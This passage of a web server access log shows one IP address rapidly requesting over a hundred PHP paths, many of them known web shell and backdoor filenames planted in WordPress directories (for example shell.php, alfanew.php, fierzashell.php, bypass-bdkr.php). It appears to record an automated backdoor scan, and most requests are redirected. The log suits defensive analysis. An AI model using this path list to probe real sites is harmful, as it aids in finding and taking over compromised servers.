(Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:29 -0500] "GET /wp-blog.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:29 -0500] "GET /wp-content/updates.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:30 -0500] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:30 -0500] "GET /wp-admin/css/colors/ectoplasm/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:24 -0500] "GET /gecko.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:24 -0500] "GET /wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:25 -0500] "GET /v3.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:25 -0500] "GET /v2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:25 -0500] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:27 -0500] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:27 -0500] "GET /ws.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:27 -0500] "GET /wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:27 -0500] "GET /wp-admin/classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:28 -0500] "GET /ty.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:29 -0500] "GET /wp-includes/customize/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:29 -0500] "GET /cc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:30 -0500] "GET /users.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:30 -0500] "GET /wp-themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:31 -0500] "GET /cache.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:31 -0500] "GET /admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.192.110 - - [20/Dec/2025:14:51:31 -0500] "GET /s.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:32 -0500] "GET /wsa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:32 -0500] "GET /filemanager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:33 -0500] "GET /ff.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.192.110 - - [20/Dec/2025:14:51:33 -0500] "GET /about/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:33 -0500] "GET /contact.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:34 -0500] "GET /wp-error.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:34 -0500] "GET /Geforce.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:34 -0500] "GET /nf_tracking.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:35 -0500] "GET /.well-known/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:35 -0500] "GET /layout.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:35 -0500] "GET /cux.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:36 -0500] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:36 -0500] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:36 -0500] "GET /backup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:36 -0500] "GET /randkeyword.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:37 -0500] "GET /wp-admin/network/wp-Grt3xj.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:37 -0500] "GET /v.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:38 -0500] "GET /wp-includes/css/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:38 -0500] "GET /plugin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:38 -0500] "GET /.well-known/pki-validation/about.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:38 -0500] "GET /.well-known/fierzashell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:39 -0500] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:39 -0500] "GET /mail.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:31 -0500] "GET /wp-content/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:31 -0500] "GET /.well-known/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:32 -0500] "GET /inc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.192.110 - - [20/Dec/2025:14:51:32 -0500] "GET /wp-configs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:32 -0500] "GET /ova.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:33 -0500] "GET /wp-content/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:33 -0500] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:34 -0500] "GET /wp-admin/includes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:34 -0500] "GET /mini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:35 -0500] "GET /ioxi002.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:35 -0500] "GET /simple/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:36 -0500] "GET /blog/fw.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:37 -0500] "GET /about.php?525 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:37 -0500] "GET /ioxi-rex4.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:37 -0500] "GET /wp-includes/fonts/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:38 -0500] "GET /sts.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:39 -0500] "GET /wp-info.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.192.110 - - [20/Dec/2025:14:51:39 -0500] "GET /o.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.192.110 - - [20/Dec/2025:14:51:40 -0500] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:40 -0500] "GET /wp-setup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:40 -0500] "GET /assets/images/doc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 13.84.156.6 - - [20/Dec/2025:14:51:39 -0500] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:39 -0500] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:40 -0500] "GET /wp-admin/setup-config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:40 -0500] "GET /wp-includes/blocks/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:41 -0500] "GET /options.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:41 -0500] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:42 -0500] "GET /ot.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:42 -0500] "GET /wp-includes/PHPMailer/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:42 -0500] "GET /wp-admin/css/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:42 -0500] "GET /admin/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:43 -0500] "GET /wp-content/cong.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:43 -0500] "GET /shell.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.192.110 - - [20/Dec/2025:14:51:44 -0500] "GET /wp-content/plugins/pwnd/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:45 -0500] "GET /wp-content/themes/deeto/login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:45 -0500] "GET /byp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:45 -0500] "GET /edit.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:45 -0500] "GET /files.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:51:46 -0500] "GET /c.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:46 -0500] "GET /g.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.192.110 - - [20/Dec/2025:14:51:47 -0500] "GET /wp-head.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:41 -0500] "GET /.well-known/acme-challenge/muse.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:41 -0500] "GET /moon.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:42 -0500] "GET /admin/controller/extension/extension/ultra.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:43 -0500] "GET /wp-content/themes/pridmag/ff2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:43 -0500] "GET /bypass-bdkr.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:43 -0500] "GET /wp-content/themes/pridmag/db.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:44 -0500] "GET /akcc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:44 -0500] "GET /gg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.192.110 - - [20/Dec/2025:14:51:44 -0500] "GET /wp-cron.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:44 -0500] "GET /mah/sck.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:45 -0500] "GET /wp-admin/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:46 -0500] "GET /wp-includes/assets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:46 -0500] "GET /link.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:46 -0500] "GET /u.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:47 -0500] "GET /goods.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:47 -0500] "GET /leafmailer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:47 -0500] "GET /av.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.192.110 - - [20/Dec/2025:14:51:48 -0500] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:48 -0500] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:47 -0500] "GET /post.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:48 -0500] "GET /wp-includes/css/dist/niil.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.192.110 - - [20/Dec/2025:14:51:48 -0500] "GET /wp-blog-header.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:49 -0500] "GET /wp-admin/admin-ajax.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:49 -0500] "GET /wp-admin/js/about.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:49 -0500] "GET /index/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:50 -0500] "GET /wp-admin/network/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.192.110 - - [20/Dec/2025:14:51:50 -0500] "GET /fuccck.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.192.110 - - [20/Dec/2025:14:51:50 -0500] "GET /wp-persicludys.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.192.110 - - [20/Dec/2025:14:51:50 -0500] "GET /k.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.192.110 - - [20/Dec/2025:14:51:51 -0500] "GET 